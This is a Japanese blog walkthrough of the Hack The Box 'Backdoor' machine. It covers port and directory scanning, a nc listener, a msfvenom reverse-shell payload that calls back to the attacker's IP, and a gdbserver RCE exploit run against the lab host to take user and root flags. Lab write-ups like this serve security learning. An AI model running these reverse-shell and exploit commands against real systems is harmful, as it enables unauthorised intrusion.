セキュリティについて学び,ついでにHack the boxを取り組んだ.
現在Active machine なのに,YouTubeに解説動画が挙がっている.(1月13日)
とりあえず,私もBackdoorのWalkthroughを書いておこうと思った.
これも参考にしたらいいよ!
ここからは,ネタバレ注意!
Step. 1 nmap scan
最初にマシーンをリセットをすること!
指定されたIPアドレスをnmapスキャンするとSSHとhttpポートが開いていることが確認できる.
$ nmap -p- 10.10.11.125 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-13 22:25 JST Nmap scan report for 10.10.11.125 Host is up (0.17s latency). Not shown: 65532 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 1337/tcp open waste Nmap done: 1 IP address (1 host up) scanned in 1162.83 seconds
ポートが確認できたので,
http://10.10.11.125/login/php で検索すると,HPが表示される
http://10.129.188.167/wp-plugins/ に進む
__________________________________________________________________
http://10.129.188.167/wp-plugins/ebook-download に進む
readme.txtが怪しいので確認.
gobuster でディレトリスキャンをしてみたり,$gobuster dir -u http://10.10.11.125 -w/usr/share/dirb/wordlists.common.txt
$ wp scan --url http://10.10.11.125 --enumerate u80 番ポートは word pressが使われているので, IDとPWをadmin など色々変えてログインしようとしても,できない...
Step. 2 飢弱性の発見.
実は,gobusterを使うとgdbサーバーで動いていることが確認できる. 下のような,エクスプロイトを使って攻撃する. 動画では別の物を使っていた. www.exploit-db.comStep. 3 攻撃
スクリプトをダウンロードしたら,nc コマンドを利用して 4444 ポートで待ち受けポートを起動する.$nc -lvnp 4444遠隔からサーバー上の任意のコマンド実行が可能! ということは外部からサーバーへ侵入できることを意味します. 自身の端末で待ち受けポートを起動できたら、先ほどの Shell.bin を利用. 外部の宛先(自身の端末宛)に対してへリバースシェル用のペイロードを msfvenom コマンドで作成する.
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=xxxxxxx LPORT=4444 PrependFork=true -o shell.bin <| xxxxは自信のipアドレスを入れる. 心配なら,"ifconfig" コマンドで自分の ip アドレスを確認しておいた方がいい. つぎに,権限を奪う.Python3 であることに注意する. >| $ python3 50539.py 10.10.11.125:1337 shell.bin4444 ポートに戻って確かめてみると,きちんとユーザーになっている. あとは,user.txt とroot.txt を cat コマンドをとる. 手に入れた root.txt を HP に戻って入力し,無事に Flag を立てることができると思う.
参考
[1] Hack The Box 日本語 Walkthrough/Writeup まとめ - Security Index (hatenablog.com) https://security-index.hatenablog.com/entry/2020/08/30/163229?amp=1#Lame[2] Backdoor HTB WP/Linux Enumeration https://www.youtube.com/watch?v=eAuUIT3I2II
[3] GNU gdbserver 9.2 - Remote Command Execution (RCE) https://www.exploit-db.com/exploits/50539